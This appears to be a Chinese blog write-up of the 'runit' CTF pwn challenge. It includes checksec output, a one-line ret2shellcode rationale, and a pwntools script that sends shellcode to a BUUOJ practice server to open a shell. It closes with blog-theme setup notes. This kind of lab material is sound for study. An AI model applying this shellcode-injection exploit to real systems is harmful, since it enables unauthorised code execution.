runit

Pwn

字数统计: 220阅读时长: 1 min

 2020/12/04   Share

pwndbg> checksec
[*] '/home/yk2/ctf/runit/pwn'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

虽然NX开了,但给了read,直接ret2shellcode

from pwn import *
from LibcSearcher import *
import subprocess

s = lambda data: sh.send(data)
sa = lambda delim, data: sh.sendafter(delim, data)
sl = lambda data: sh.sendline(data)
sla = lambda delim, data: sh.sendlineafter(delim, data)
sea = lambda delim, data: sh.sendafter(delim, data)
r = lambda numb=4096: sh.recv(numb)
ru = lambda delims, drop=True: sh.recvuntil(delims, drop)
info_addr = lambda tag, addr: sh.info(tag + ': {:#x}'.format(addr))
itr = lambda: sh.interactive()
debug = lambda command='': gdb.attach(sh, command)
context(arch='i386', os='linux',log_level="debug")


def one_gadget(filename):
    return map(int, subprocess.check_output(['one_gadget', '--raw', filename]).split(' '))


# one_gadget('/lib/x86_64-linux-gnu/libc.so.6')
# libc=LibcSearcher('puts',puts
sh = remote('node3.buuoj.cn',25490)#process('/home/yk2/ctf/runit/pwn')
ru('!!')
sl(asm(shellcraft.sh()))

itr()

原文作者：Yk2eR0

原文链接：https://www.yk2er0.fun/2020/12/04/runit/

发表日期：十二月 4日 2020, 4:12:28 下午

更新日期：April 5th 2021, 9:26:26 am

Next Post

router-tools
Previous Post

shell指令学习

CATALOG



缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是archer根目录）执行以下命令：
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置：

jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true